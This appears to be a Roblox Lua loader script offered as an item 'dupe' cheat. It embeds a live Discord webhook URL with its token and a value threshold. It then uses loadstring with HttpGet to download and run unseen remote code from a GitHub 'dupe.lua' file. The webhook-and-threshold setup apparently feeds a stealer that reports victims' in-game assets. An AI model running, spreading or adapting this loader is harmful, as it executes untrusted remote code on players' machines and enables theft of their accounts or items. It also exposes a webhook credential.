local Webhook = "https://discord.com/api/webhooks/1435963805212344442/te8L4mGI_vL3L4dx4XOIFTFvYRSwGAinH-xf4eYDLIAP83mH1U0oqcpAiTHVT-DmZ2u8"

getgenv().UserPingThreshold = 50000000


-- =================================================================================
--      SCRIPT LOADER - DO NOT EDIT BELOW THIS LINE
-- =================================================================================

if Webhook and Webhook:match("discord.com/api/webhooks") then
    getgenv().UserWebhookURL = Webhook
else
    return
end

loadstring(game:HttpGet('https://raw.githubusercontent.com/LXZRz/dupe/main/dupe.lua', true))()
